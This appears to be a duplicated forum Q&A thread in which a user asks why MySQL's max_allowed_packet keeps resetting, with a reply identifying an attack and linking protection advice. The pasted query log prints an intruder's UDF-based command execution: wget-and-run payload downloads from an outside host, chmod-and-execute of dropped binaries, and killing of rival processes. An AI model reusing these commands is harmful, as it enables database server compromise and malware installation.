max_allowed_packet 正在重置为 1024,因为一些未知的应用程序
max_allowed_packet is resetting to 1024 because some unknown application
每当我更改 max_allowed_packet 时,它会在几个小时后重置。当我检查查询日志时,我发现了以下查询。但我无法弄清楚哪个应用程序或进程执行此查询。
有谁知道这是关于什么的?还是 mysql 本身?
161020 3:09:34 723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_set RETURNS int SONAME 'ptfuki32.so'
161020 3:09:35 723 Query CREATE FUNCTION sys_exec RETURNS int SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'ptfuki32.so'
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020 3:09:36 723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020 3:09:37 723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Quit
724 Connect root@ip on mysql
161020 3:09:38 724 Query SHOW VARIABLES LIKE '%compile_os%'
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
161020 3:09:39 724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('killall -9 .sshd')
724 Query select sys_eval('killall -9 .sh')
161020 3:09:40 724 Query select sys_eval('killall -9 and1')
724 Query select sys_eval('killall -9 cisco')
724 Query select sys_eval('killall -9 ciscoh')
724 Query select sys_eval('killall -9 L24')
724 Query select sys_eval('killall -9 L26')
161020 3:09:41 724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
724 Query select sys_eval('chmod 777 http://ip:5555;')
724 Query select sys_eval('./http://ip:5555;')
724 Query select sys_eval('kill str=`netstat -anept 2>/dev/null |grep -E ':(68866|7583|2222|10711|6009|10991|10771|7168|7668|36000|36001|25000|25001|25002)'|cut -d / -f 1`')
724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
161020 3:09:42 724 Query select sys_eval('wget http://ip4:5555/v9mm;chmod 777 v9mm;./v9mm;')
724 Quit
725 Connect root@ip on mysql
725 Query SHOW VARIABLES LIKE '%compile_os%'
161020 3:09:43 725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query FLUSH PRIVILEGES
725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query FLUSH PRIVILEGES
161020 3:09:44 725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
725 Query DROP FUNCTION IF EXISTS sys_get
725 Query DROP FUNCTION IF EXISTS sys_set
161020 3:09:45 725 Query DROP FUNCTION IF EXISTS sys_exec
725 Query DROP FUNCTION IF EXISTS sys_eval
725 Query DROP FUNCTION IF EXISTS cmdshell
725 Query set global log_bin_trust_function_creators=0
725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
161020 3:09:46 725 Query SET GLOBAL log_bin_trust_routine_creators=0
725 Query SET GLOBAL max_allowed_packet=1024
725 Query FLUSH PRIVILEGES
725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
725 Query DROP FUNCTION IF EXISTS sys_get
161020 3:09:47 725 Query DROP FUNCTION IF EXISTS sys_set
725 Query DROP FUNCTION IF EXISTS sys_exec
725 Query DROP FUNCTION IF EXISTS sys_eval
725 Query DROP FUNCTION IF EXISTS cmdshell
725 Query set global log_bin_trust_function_creators=0
161020 3:09:48 725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
725 Query SET GLOBAL log_bin_trust_routine_creators=0
725 Query SET GLOBAL max_allowed_packet=1024
725 Query FLUSH PRIVILEGES
725 Quit
似乎有人用 sql 注入攻击了我的 mysql 服务器。
cna12.dll 是恶意软件文件。检查下面的 link 以防止此类攻击
https://malwaremusings.com/2013/02/14/how-to-protect-yourself-from-the-cna12-dll-mysql-attacks/
每当我更改 max_allowed_packet 时,它会在几个小时后重置。当我检查查询日志时,我发现了以下查询。但我无法弄清楚哪个应用程序或进程执行此查询。 有谁知道这是关于什么的?还是 mysql 本身?
161020 3:09:34 723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_set RETURNS int SONAME 'ptfuki32.so'
161020 3:09:35 723 Query CREATE FUNCTION sys_exec RETURNS int SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'ptfuki32.so'
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020 3:09:36 723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020 3:09:37 723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Quit
724 Connect root@ip on mysql
161020 3:09:38 724 Query SHOW VARIABLES LIKE '%compile_os%'
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
161020 3:09:39 724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('killall -9 .sshd')
724 Query select sys_eval('killall -9 .sh')
161020 3:09:40 724 Query select sys_eval('killall -9 and1')
724 Query select sys_eval('killall -9 cisco')
724 Query select sys_eval('killall -9 ciscoh')
724 Query select sys_eval('killall -9 L24')
724 Query select sys_eval('killall -9 L26')
161020 3:09:41 724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
724 Query select sys_eval('chmod 777 http://ip:5555;')
724 Query select sys_eval('./http://ip:5555;')
724 Query select sys_eval('kill str=`netstat -anept 2>/dev/null |grep -E ':(68866|7583|2222|10711|6009|10991|10771|7168|7668|36000|36001|25000|25001|25002)'|cut -d / -f 1`')
724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
161020 3:09:42 724 Query select sys_eval('wget http://ip4:5555/v9mm;chmod 777 v9mm;./v9mm;')
724 Quit
725 Connect root@ip on mysql
725 Query SHOW VARIABLES LIKE '%compile_os%'
161020 3:09:43 725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query FLUSH PRIVILEGES
725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query FLUSH PRIVILEGES
161020 3:09:44 725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
725 Query DROP FUNCTION IF EXISTS sys_get
725 Query DROP FUNCTION IF EXISTS sys_set
161020 3:09:45 725 Query DROP FUNCTION IF EXISTS sys_exec
725 Query DROP FUNCTION IF EXISTS sys_eval
725 Query DROP FUNCTION IF EXISTS cmdshell
725 Query set global log_bin_trust_function_creators=0
725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
161020 3:09:46 725 Query SET GLOBAL log_bin_trust_routine_creators=0
725 Query SET GLOBAL max_allowed_packet=1024
725 Query FLUSH PRIVILEGES
725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
725 Query DROP FUNCTION IF EXISTS sys_get
161020 3:09:47 725 Query DROP FUNCTION IF EXISTS sys_set
725 Query DROP FUNCTION IF EXISTS sys_exec
725 Query DROP FUNCTION IF EXISTS sys_eval
725 Query DROP FUNCTION IF EXISTS cmdshell
725 Query set global log_bin_trust_function_creators=0
161020 3:09:48 725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
725 Query SET GLOBAL log_bin_trust_routine_creators=0
725 Query SET GLOBAL max_allowed_packet=1024
725 Query FLUSH PRIVILEGES
725 Quit
似乎有人用 sql 注入攻击了我的 mysql 服务器。 cna12.dll 是恶意软件文件。检查下面的 link 以防止此类攻击 https://malwaremusings.com/2013/02/14/how-to-protect-yourself-from-the-cna12-dll-mysql-attacks/